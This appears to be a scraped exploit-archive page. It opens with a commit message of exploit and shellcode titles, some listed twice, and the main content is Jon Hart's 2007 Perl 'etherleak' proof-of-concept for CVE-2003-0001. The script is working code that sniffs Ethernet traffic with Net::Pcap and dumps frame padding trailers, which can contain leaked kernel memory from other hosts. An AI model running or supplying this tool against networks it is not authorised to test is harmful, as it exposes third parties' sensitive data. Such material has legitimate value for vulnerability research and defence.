880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
203 lines
No EOL
6.8 KiB
Perl
Executable file
203 lines
No EOL
6.8 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/6535/info
|
|
|
|
Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers.
|
|
|
|
Frames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.
|
|
|
|
Cisco has stated that the IOS 12.1 and 12.2 trains are not affected.
|
|
|
|
National Semiconductor Ethernet controller chips are not vulnerable to this issue.
|
|
|
|
#!/usr/bin/perl -w
|
|
# etherleak, code that has been 5 years coming.
|
|
#
|
|
# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,
|
|
# a vulnerability that would be come known as the 'etherleak' bug. In
|
|
# various situations an ethernet frame must be padded to reach a specific
|
|
# size or fall on a certain boundary. This task is left up to the driver
|
|
# for the ethernet device. The RFCs state that this padding must consist
|
|
# of NULLs. The bug is that at the time and still to this day, many device
|
|
# drivers do not pad will NULLs, but rather pad with unsanitized portions
|
|
# of kernel memory, oftentimes exposing sensitive information to remote
|
|
# systems or those savvy enough to coerce their targets to do so.
|
|
#
|
|
# Proof of this can be found by googling for 'warchild and etherleak', or
|
|
# by visiting:
|
|
#
|
|
# http://lkml.org/lkml/2002/4/27/101
|
|
#
|
|
# This was ultimately fixed in the Linux kernel, but over time this
|
|
# vulnerability reared its head numerous times, but at the core the
|
|
# vulnerability was the same as the one I originally published. The most
|
|
# public of these was CVE-2003-0001, which was assigned to address an
|
|
# official @stake advisory.
|
|
#
|
|
# This code can be found its most current form at:
|
|
#
|
|
# http://spoofed.org/files/exploits/etherleak
|
|
#
|
|
# Jon Hart <jhart@spoofed.org>, March 2007
|
|
#
|
|
|
|
use strict;
|
|
use diagnostics;
|
|
use warnings;
|
|
use Getopt::Long;
|
|
use Net::Pcap;
|
|
use NetPacket::Ethernet qw(:ALL);
|
|
use NetPacket::IP qw(:ALL);
|
|
|
|
my %opts = ();
|
|
my ($iface, $err, $pcap_t, $pcap_save, $filter_string);
|
|
|
|
GetOptions( \%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or
|
|
die "Unknown option: $!\n" && &usage();
|
|
|
|
if (defined($opts{'help'})) {
|
|
&usage();
|
|
exit(0);
|
|
}
|
|
|
|
if (defined($opts{'read'})) {
|
|
$pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err);
|
|
if (!defined($pcap_t)) {
|
|
print("Net::Pcap::open_offline failed: $err\n");
|
|
exit 1;
|
|
}
|
|
} else {
|
|
if (defined($opts{'interface'})) {
|
|
$iface = $opts{'interface'};
|
|
} else {
|
|
$iface = Net::Pcap::lookupdev(\$err);
|
|
if (defined($err)) {
|
|
print(STDERR "lookupdev() failed: $err\n");
|
|
exit(1);
|
|
} else {
|
|
print(STDERR "No interface specified. Using $iface\n");
|
|
}
|
|
}
|
|
|
|
$pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err);
|
|
if (!defined($pcap_t)) {
|
|
print("Net::Pcap::open_live failed on $iface: $err\n");
|
|
exit 1;
|
|
}
|
|
}
|
|
|
|
my $filter;
|
|
if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {
|
|
printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t));
|
|
exit(1);
|
|
}
|
|
|
|
if (Net::Pcap::setfilter($pcap_t, $filter) == -1) {
|
|
printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t));
|
|
exit(1);
|
|
}
|
|
|
|
if (defined($opts{'write'})) {
|
|
$pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});
|
|
if (!defined($pcap_save)) {
|
|
printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t));
|
|
exit(1);
|
|
}
|
|
}
|
|
|
|
Net::Pcap::loop($pcap_t, -1, \&process, "foo");
|
|
Net::Pcap::close($pcap_t);
|
|
|
|
if (defined($opts{'write'})) {
|
|
Net::Pcap::dump_close($pcap_save);
|
|
}
|
|
|
|
|
|
|
|
sub process {
|
|
my ($user, $hdr, $pkt) = @_;
|
|
my ($link, $ip);
|
|
my $jump = 0;
|
|
|
|
my $datalink = Net::Pcap::datalink($pcap_t);
|
|
if ($datalink == 1) { $jump += 14; }
|
|
elsif ($datalink == 113) { $jump += 16; }
|
|
else { printf("Skipping datalink $datalink\n"); return; }
|
|
|
|
my $l2 = NetPacket::Ethernet->decode($pkt);
|
|
|
|
if ($l2->{type} == ETH_TYPE_IP) {
|
|
$ip = NetPacket::IP->decode(eth_strip($pkt));
|
|
$jump += $ip->{len};
|
|
} elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }
|
|
else {
|
|
# assume 802.3 ethernet, and just jump ahead the length
|
|
for ($l2->{dest_mac}) {
|
|
if (/^0180c200/) {
|
|
# spanning tree
|
|
# l2->{type} here will actually be the length. HACK.
|
|
$jump += $l2->{type};
|
|
}
|
|
elsif (/^01000ccccc/) {
|
|
# CDP/VTP/DTP/PAgP/UDLD/PVST, etc
|
|
# l2->{type} here will actually be the length. HACK.
|
|
$jump += $l2->{type};
|
|
} elsif (/^ab0000020000/) {
|
|
# DEC-MOP-Remote-Console
|
|
return;
|
|
} else {
|
|
# loopback
|
|
if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }
|
|
printf("Skipping datalink $datalink l2 type %s\n", $l2->{type}); return;
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
if ($hdr->{len} > $jump) {
|
|
my $trailer_bin = substr($pkt, $jump);
|
|
my $trailer_hex = "";
|
|
my $trailer_ascii = "";
|
|
foreach (split(//, $trailer_bin)) {
|
|
$trailer_hex .= sprintf("%02x", ord($_));
|
|
if (ord($_) >= 32 && ord($_) <= 126) {
|
|
$trailer_ascii .= $_;
|
|
} else { $trailer_ascii .= "."; }
|
|
}
|
|
# ignore all trailers that are just single characters repeated.
|
|
# most OS' use 0, F, 5 or a.
|
|
unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) {
|
|
unless ($opts{'quiet'}) {
|
|
print("#"x80, "\n");
|
|
printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac});
|
|
if ($l2->{type} == ETH_TYPE_IP) {
|
|
printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip});
|
|
}
|
|
}
|
|
print("$trailer_hex\t$trailer_ascii\n");
|
|
if (defined($opts{'write'})) {
|
|
Net::Pcap::dump($pcap_save, $hdr, $pkt);
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
sub usage {
|
|
print <<EOF;
|
|
$0 -- A demonstration of the infamous 'etherleak' bug.
|
|
|
|
CVE-2003-0001, and countless repeats of the same vulnerability.
|
|
|
|
Options:
|
|
[-h|--help] # this message
|
|
[-i|--interface] <interface> # interface to listen on
|
|
[-f|--filter] <pcap filter> # apply this filter to the traffic
|
|
[-r|--read] <path to pcap> # read from this saved pcap file
|
|
[-w|--write] <path to pcap> # write tothis saved pcap file
|
|
[-q|--quiet] # be quiet
|
|
[-v|--verbose] # be verbose
|
|
|
|
EOF
|
|
|
|
|
|
}
|
|
|
|
# milw0rm.com [2007-03-23] |